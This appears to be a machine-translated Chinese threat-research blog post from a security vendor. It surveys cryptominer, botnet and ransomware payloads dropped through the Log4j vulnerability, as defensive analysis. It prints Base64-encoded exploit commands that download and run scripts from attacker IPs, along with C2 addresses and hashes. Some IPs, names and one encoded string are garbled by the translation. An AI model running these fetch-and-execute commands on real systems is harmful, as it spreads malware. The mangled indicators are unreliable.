Log4j 漏洞帶來的深遠影響

上周，Log4j 漏洞顛覆了互聯網，影響是巨大。攻擊者也已經開始利用該漏，到目前為止，Uptycs 研究人員已經觀察到與 coinminers、DDOS 惡意軟件和一些勒索軟件變種相關的攻擊，這些攻擊積極利用了此漏洞。

未來幾天勒索軟件攻擊的規模可能會增加。由于該漏洞非常嚴重，因此可能還會發現一些可以繞過當前補丁級別或修復程序的變體。因針對這種攻擊持續監控和強化系統是極其重要的。

Uptycs 此前在博客中為其客戶分享了有關補救和檢測步驟的詳細信息 。并討論了攻擊者利用 Log4j 漏洞的各種惡意軟件類別。Uptycs 威脅研究團隊確定了投放在易受攻擊的服務器上的不同類型的有效載荷。有效載荷包括著名的惡意軟件，如 Kinsing 和 Xmrig coinminers，以及 Dofloo、Tsunami 和 Mirai 僵尸網絡惡意軟件。除了這些惡意軟件系列，攻擊者已經開始在在易受CVE-2021-44228服務器上部署勒索軟件。  

01 Xmrig    

Xmrig 是一個開源的 Monero CPU Miner，用于挖掘 Monero 加密貨幣。攻擊者利用 Log4j2 漏洞后，攻擊者試圖運行惡意 shell 腳本，其中包含下載 xmrig 礦工的命令。

命令是 93.189.42 8 []：5557，/基本/命令/ Base64/編碼 KGN1cmwgLXMgOTMuMTg5LjQyLjgvbGguc2h8fHdnZXQgLXEgLU8tIDkzLjE4OS40Mi44L2xoLnNoKXxiYXNo。

此命令下載礦工shell 腳本/46bd3a99981688996224579db32c46af17f8d29a6c90401fb2f13e918469aff6  

shell 腳本（見圖 1）首先殺死已經在運行的礦工二進制文件，然后從互聯網下載 xmrig 礦工二進制文件并運行它。 

圖 1：Shell 腳本下載并執行 Xmrig

02 Kinsing    

Kinsing 是一種自我傳播的加密挖掘惡意軟件，以前針對配置錯誤的開放 Docker Daemon API 端口。Kinsing 惡意軟件是用 golang 編寫的，通常是通過惡意 shell 腳本刪除的。kinsing shell 腳本包括幾種防御規避技術，如 setfacl 使用、chattr 使用、日志刪除命令等。 

大規模掃描后的攻擊者試圖在易受攻擊的服務器上放置 kinsing 二進制文件。攻擊者用來刪除和運行 shell 腳本的：92.242.40[.]21:5557,/Basic/Command/Base64/KGN1cmwgLXMgOTIuMjQyLjQwLjIxL2xoLnNofHx3Z2V0IC1xIC1PLSA5NDAGugc2gEg2gEg2gEg2.

在shell腳本：7e9663f87255ae2ff78eb882efe8736431368f341849fec000543f027bdb4512）中，我們可以看到攻擊者在 shell 腳本運行時放置了刪除 kinsing 惡意軟件二進制文件的命令（見圖 2）。

圖 2：通過 shell 腳本下載 Kinsing

kinsing shell 腳本還包含與 docker 相關的命令，這些命令會殺死受害系統上已經運行的礦工進程（如果存在）。

圖 3：用于殺死已經運行的礦工的 docker 命令

03 DDoS 僵尸網絡負載     

在一些漏洞利用嘗試中，攻擊者試圖刪除分布式拒絕服務 (DDoS) 惡意軟件二進制文件，如 dofloo、Mirai。

04 Dofloo    

Dofloo （又名 AeSDdos，flooder）是一種DDoS類型的惡意軟件，可對目標 IP 地址進行各種泛洪攻擊，如 ICMP 和 TCP。除了泛洪攻擊外，Dofloo 通過操縱受害者系統中的 rc.local 文件來確保其持久性。它的一些變體在受害計算機上部署了加密貨幣礦工。

在情報系統中，攻擊者也在利用易受攻擊的服務器后投放 Dofloo 惡意軟件。由攻擊者使用完整的命令是 81.30.157 43 []：1389，/基本/命令/ Base64編碼/ d2dldCBodHRwOi8vMTU1Ljk0LjE1NC4xNzAvYWFhO2N1cmwgLU8gaHR0cDovLzE1NS45NC4xNTQuMTcwL2FhYTtjaG1vZCA3NzcgYWFhOy4vYWFh。下圖（參見圖 4）顯示了 Dofloo 對 rc.local 的操作：6e8f2da2a4facc2011522dbcdaca509195bfbdb84dbdc840382b9c40d7975548）在 Log4j 后利用中使用的變體。 

圖 4：Dofloo 操作 rc.local

05 mushtik

海嘯（又名mushtik）是基于DDoSflooder一個跨平臺的惡意軟件，在下載文件過程中被感染系統中執行shell的命令。海嘯樣本：4c97321bcd291d2ca82c68b02cde465371083dace28502b7eb3a88558d7e190c）使用 crontab 作為持久性。除了持久性，它還刪除一個副本 /dev/shm/ 目錄作為防御規避策略（參見圖 5）。

圖 5：Tsunami 通過 cron 從 /dev/shm 運行

06 Mirai 

Mirai是一種惡意軟件，它感染在 ARC 處理器上運行的智能設備，將它們變成一個遠程控制的機器人網絡。Mirai 還通過惡意 shell 腳本傳送。攻擊者使用的命令是 45.137.21[.]9:1389,/Basic/Command/Base64/d2dldCAtcSAtTy0gaHR0cDovLzYyLjIxMC4xMzAuMjUwL2xoLnNofGJhc2g=。該命令使用 wget 實用程序從攻擊者 C2，62.210.130[.]250 中刪除 Mirai 惡意軟件（見圖 6）。

圖 6：從 C2 下載 mirai 的 Shell 腳本

07 Linux

攻擊者還利用 Log4j 漏洞在易受攻擊的服務器上投放 Linux 勒索軟件。攻擊者在利用 Log4j 漏洞后試圖刪除Linux 勒索軟件：5c8710638fad8eeac382b0323461892a3e1a8865da3625403769a4378622077e。勒索軟件是用 golang 編寫的，并操縱 ssh 文件在受害者系統中傳播自身。攻擊者丟棄的贖金票據如下所示（見圖 7）。

圖 7：Linux 贖金說明

08 Uptycs EDR

Uptycs EDR 使用映射到 MITRE ATT&CK 和 YARA 進程掃描的行為規則成功檢測到所有有效負載。下面顯示了我們的行為規則主動檢測到的 Linux 勒索軟件的示例（參見圖 8）。

圖 8：使用 Uptycs EDR 檢測勒索軟件

09 Xmrig    

除了行為規則之外，當 YARA 檢測被觸發時，Uptycs EDR 通過威脅研究團隊策劃的 YARA 規則分配威脅配置文件。用戶可以導航到檢測警報中的工具包數據部分，然后單擊名稱以查找工具包的說明。Uptycs EDR 檢測到的 Xmrig 惡意軟件活動的摘錄如下所示（見圖 9）。

圖 9：使用 Uptycs EDR 進行 XMrig 檢測